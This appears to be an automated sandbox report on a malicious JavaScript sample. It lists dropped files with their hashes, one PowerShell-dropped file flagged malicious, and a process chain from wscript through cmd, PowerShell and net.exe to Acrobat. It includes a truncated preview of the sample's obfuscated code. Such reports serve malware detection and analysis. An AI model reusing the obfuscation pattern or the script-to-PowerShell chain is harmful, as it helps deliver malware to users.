Entropy (8bit): | 5.305672766113946 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfYdPeUkwRe9:YvXKX90eGcbwZGg8Ukee9 |
MD5: | C5A23F2FAA02C3BC103534F02A3982D4 |
SHA1: | 79243CF5CB269A05F36EF3D66FE2808537834676 |
SHA-256: | 3923466BB8B6C7207A222EDCB6A7721A7559BB4FB3409ABEABADB910AD0BDE72 |
SHA-512: | F98DB21A3EA1D86BC99EC2B970EB8440633490AF5A550F1CC47D9F3B6E6847EF75A3E9844B42EA9076EAF14139FB537C0D62C6E2AF80456442EA90B2FF4E52BC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.29150531004663 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJf+dPeUkwRe9:YvXKX90eGcbwZG28Ukee9 |
MD5: | 0A617BD66D8B6BF55B3DCB76D7472466 |
SHA1: | 1D63E6F68C592FA9A4B96EE5696093EDAC13485B |
SHA-256: | B817D2FFA8DE05F4FE9FC2B61237515AFD5D38CBFC5F2F7CAE0D1C0F4B79B207 |
SHA-512: | FD2359B156E9018002D9827AD0AF2B2CBEDE1A26C351B52528D0FFF7304CB3F20D1AF9C0E8DD78B0A56C020EA90871CAA59EEA7266EF9F745D45C0ACDB4183AD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.289180875704552 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfbPtdPeUkwRe9:YvXKX90eGcbwZGDV8Ukee9 |
MD5: | 22452D113BC92AC20662D54183F79421 |
SHA1: | 7ED7CC6DAA9B1BCC21F85F33BFF8BF7C57AF7C75 |
SHA-256: | E023BA40B93A26913AF58B53B904D0E2DE11512EA80AE70E33197B58514D5313 |
SHA-512: | 1EB054F936F7064413CFB6197F151574FFD5A954EE8BA264402A3F544B73F82B12083B12949176CF8F93A6FA20568A0416824CD0BE47B9F9679F1FB7C3AC53C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.292640715572563 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJf21rPeUkwRe9:YvXKX90eGcbwZG+16Ukee9 |
MD5: | A9CCFAA4497ABAAAB9CBDC35FA00CC99 |
SHA1: | FDA43B504054B6F1C0393762BDFE28C67D188ABE |
SHA-256: | D04CAEAE85DCE9E8BFDB129465EBC2E988F5661C2CE8A5471B4211F2916CB223 |
SHA-512: | 8655BDC48FC58225446356BA9344E9C5B4C102D03E453E1F997CAC80BBC8C336DB438D675F7ACF5D72B27CE602455772B6BADFBD5DAF44EF34C9F2DC9F058219 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.672393875303871 |
Encrypted: | false |
SSDEEP: | 24:Yv6XqYsiamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BS/:Yvn8BgkDMUJUAh8cvM/ |
MD5: | F4C698B440681F8FBAD89D09B29B6C99 |
SHA1: | CFAF4853F7E7BA05AA9A0AC0B6588A3F590B6D52 |
SHA-256: | 7C58F1D0071BB2F0B63F3A9DFF2BC80BB4954275AED1250800CB78C4979B8DF7 |
SHA-512: | 2F5FAF62CA24E157C6EE2DF74662DF95E5595DA6AECD074294AA551613CD358C7511DC8CF263C1FF3DB5CCB1DE5310525F2CE1FEB899E4666641BB3D399087C8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.269975500498831 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJfshHHrPeUkwRe9:YvXKX90eGcbwZGUUUkee9 |
MD5: | 7836E34CBBEFF2B306D5FE9C124F24D6 |
SHA1: | 812130B69968A0E837216145C45700709AD3A3CC |
SHA-256: | 04DF7E1E018E10A2991B641576F53E444F14ECA88F7C7885B9FBC6319375B124 |
SHA-512: | D1CC8104D6D658977B2A6892213EAFB3FAE8230BFEEB5F5727DFB8E8D7C11FD88615F297679416BD5D8EE9450F612F4A41BDC613AC7FFCC27A47CB0630CD3360 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.275849757899013 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HX90djMGnZiQ0YQ70JqoAvJTqgFCrPeUkwRe9:YvXKX90eGcbwZGTq16Ukee9 |
MD5: | 917A5582D769FA1FB444134F4D7C7F62 |
SHA1: | 2B28458A3CACC47241C6DEE9DB6E89D1D60E0470 |
SHA-256: | 0225B9C10683C805087743E0AABCFB3B8C4D81AAB860774BC11085D88E1F739A |
SHA-512: | 110203832BE4FE13595F6061B926807AD04D1712116326BF5475D6877E68629243AF6021F396A1AFD6F6C5A3E24DBBD8F02572B7DB36D0D247BE81515E435A76 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.150532625629089 |
Encrypted: | false |
SSDEEP: | 24:YZnGamG913ayoqWjjHkgJ6ukIJcOYZJ9j+yCbj0STak0z2su2LS9CrcEY368DUn9:Yp91aZsTZ/+y4rGCzecEYK8zGn9D7H |
MD5: | 257A72674800E7381A5048C05BF24E1C |
SHA1: | 4E405E882EFA31C7F7FD33B96624E312D04D3E6D |
SHA-256: | 6DDB746ED442E445F9461708E2E9274D93272C1EEFC8A7BC87D2A01E33A4BD3B |
SHA-512: | 6809C69DF765042DA826FFBDF27D7AC65A08BCD004A6791B59A4D1143C08F0F985ABCB8A9358C0605B77AF8AD3DCCDD4C2F4F0B6D36840CA39C6ADDD3AE5FD6A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.1451463502912371 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursUp0RZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudp:TFl2GL7msjXc+XcGNFlRYIX2v3k6 |
MD5: | 979AEB942AE52C272E4193F21F8CCA46 |
SHA1: | 7B23FCB922DA57EAA759E67A0EC15A033C9C23B0 |
SHA-256: | A2D373A4DED9FED7B60730BEC692ECF277E3926117D8F606603F666AE1A54B82 |
SHA-512: | A654C317E8429A2B9C23E301D981F77E2CF4384F9546C8792CF92EE6AFD3A827EA20AD7050DD32B66ED8393B3831BDB7D305F91923F3372487A92CE505004383 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5504658253361256 |
Encrypted: | false |
SSDEEP: | 24:7+tGp0UXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux8fqLxx/Xy:7MWXc+XcGNFlRYIX2vVfqVl2GL7msU |
MD5: | 30CE37F079A2C6B002BB6014F356C4CE |
SHA1: | 4859C5A8803DB8DC44003A8545AFBFDDC7D43DF5 |
SHA-256: | 475CE4D2D0EF75D161EC344E4B5018CE3C1784BA4E8FCCBB51EC13946E65AE0E |
SHA-512: | 2A22CB0A02A8DBB6793C923D1A61879442EDDE80FE09BDCF2A7A0382E3735544DF26CC78E69B68DBC64A6B6A39EE81B39C8F5B6F5C68F5A1E265F904DE5EB89C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg/UIloPaxxUlKuQW8K22hZ2tcBYYyu:6a6TZ44ADE/UI2PaxxzutAcqK |
MD5: | 9F242FF0CD0EAB12BFCCFC3355BCC047 |
SHA1: | 39AE74C513241731B39AFC5C3CD1707F845FAC83 |
SHA-256: | A6480CF9591358F6C3E983D0D06C5BEA126A528E12BD4C8275EB4511ABDF8668 |
SHA-512: | E7CEBE3A907957FDED01CCB58878BC9DCAAD006E99F7383E921B22A56ADF583FFD3A39161791EF044CB4EB83DD56A1842648D56EF12595484F11E353395B5BBE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulnmWllZ:NllUmWl |
MD5: | 3EBBEC2F920D055DAC842B4FF84448FA |
SHA1: | 52D2AD86C481FAED6187FC7E6655C5BD646CA663 |
SHA-256: | 32441EEF46369E90F192889F3CC91721ECF615B0395CEC99996AB8CF06C59D09 |
SHA-512: | 163F2BECB9695851B36E3F502FA812BFBF6B88E4DCEA330A03995282E2C848A7DE6B9FDBA740E3DF536AB65390FBE3CC5F41F91505603945C0C79676B48EE5C3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.524398495091119 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K88Clw1w:Qw946cPbiOxDlbYnuRKd3w |
MD5: | BE791C0633CFE0484E4E47B7F6B767D4 |
SHA1: | E20151C89D97767D2CFD40AD03C277102C770D07 |
SHA-256: | F60FD38C4193684B324CD4C81973A05B7DB5AA4F22527BCC584CFB6E9053E1F7 |
SHA-512: | AB3D9C3B0F554DA9C62446D40DA6BFB0A939B0F3370FFCB24A35F12DFED405678DC029E5A0BEBBB31557101C3F90451E9572A3635F8A1258D0B19F915891C951 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-11 02-43-53-258.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15090 |
Entropy (8bit): | 5.346312716577632 |
Encrypted: | false |
SSDEEP: | 384:hS2z+KXif7Iw9S73pZ6xTO8EsvoyomWaV5unlDbFmznyPy0WTjkL8ReRgJga5d2q:Oog1 |
MD5: | A19278EC9BA6222B2B396A62FEDC0BE0 |
SHA1: | 608AB81B0E18F6A0272CD711CA6E0D7CB52DEC9D |
SHA-256: | 2092361B3B5F78E7B8A21E032391EDCDD2907CF0A968F1150AE554B6F69D3479 |
SHA-512: | 286D7460412671A6E1BB62A27A5884B38ACB743AEE920559A7AFDC63A2DECEFDDA62BDD855E3C7FFB90D7FCA5C466BEDA8ED62CF28A951B4980A5336F0FB0191 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.397202129191682 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbucb4Iq+cbh:V3fOCIdJDerqt |
MD5: | 7E011AADD229098E713C14B649FFFB06 |
SHA1: | 8465A5058BF68E372D21800604F037012A43B04D |
SHA-256: | BC0237966FF69309FF5EF463F5AB47BE593F97360423C0754BD85AAC7E1FA5DF |
SHA-512: | 23FD6A86F80232A4517AF7CCEAD622826B907A0DC04BC2A495A1EB7A3DE21B81512478DB4D60E01C27C702BCD5731BCFD13500D534B9CE366DC5D7FC30970802 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/xA7owWLkwYIGNPMGZfPdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLkwZGuGZn3mlind9i4ufFXpAXkru |
MD5: | CA6B0D9F8DDC295DACE8157B69CA7CF6 |
SHA1: | 6299B4A49AB28786E7BF75E1481D8011E6022AF4 |
SHA-256: | A933C727CE6547310A0D7DAD8704B0F16DB90E024218ACE2C39E46B8329409C7 |
SHA-512: | 9F150CDA866D433BD595F23124E369D2B797A0CA76A69BA98D30DF462F0A95D13E3B0834887B5CD2A032A55161A0DC8BB30C16AA89663939D6DCF83FAC056D34 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLcGZtwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLcGZa |
MD5: | 22B260CB8C51C0D68C6550E4B061E25A |
SHA1: | DF9A5999C58A8D5ADBB3F8D1111EAB9E4778637E |
SHA-256: | DAB1231CC22DAB591EBB91C853E3EE41C10D3DA85D2EFAB67E9A52CCB3A3A5A0 |
SHA-512: | 503218D83C511A7F7CEA8BC171921D1435664B964F01A8C77DC0F4D0196DD2815D9444DA98278E1369552D004E9B091DD9B89663209F0C52ACB97FCE6AFFE7A9 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.931919788204248 |
TrID: | |
File name: | 89131879533771361.js |
File size: | 20'711 bytes |
MD5: | 40334f46c28528c393e7bf8e0bff8bfa |
SHA1: | 903b983702b0bddc717bc9abf5b980aed5e65eaa |
SHA256: | b36af90b0a6a551c9d360b02aab7ffb28e73f5a6cb2e8a1ba73af82356a9beab |
SHA512: | 9756a54b920698ad1c641c201af116f568d30ce9bdd343bd0c036bdb2c6edd30e045e63bf20e513351dcd3a934e747b64b3f1a878d00e644b30db5c01c52475c |
SSDEEP: | 384:B8ZDbwDLDJ9avuzrOjHfRIxu2a2ixaL4I49Z/FzihR6SxBClImVTWebnRoI3TTeH:IDbwDLDJagrOjHfRIxu2a2ixaL4I49ZU |
TLSH: | 229297CBA90B4E67F2EC0886856F3957E4ED130887C402DF584551D53EBEA10A3F697E |
File Content Preview: | function zvvogax(){rvxnki=[1031,3079,5127,4103,2055,3072];var vgovrra=this[wpknsffj+lfhdgijbu+fobdlapau+hcapk+xvtodzdkh+aexlyz+pnfxxep+dmnjixvs](this[aiihbju+weiehitr+nvicydhu+fobdlapau+gkfixmqc+wpknsffj+dmnjixvs][gpslkdq+fobdlapau+xvtodzdkh+lfhdgijbu+dmn |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 02:43:44 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7f7540000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 02:43:44 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c5160000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 02:43:44 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 02:43:45 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 02:43:49 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 02:43:49 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7c5160000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 02:43:49 |
Start date: | 11/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7402b0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 02:43:50 |
Start date: | 11/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
File size: | 3'581'912 bytes |
MD5 hash: | 9B38E8E8B6DD9622D24B53E095C5D9BE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 9 |
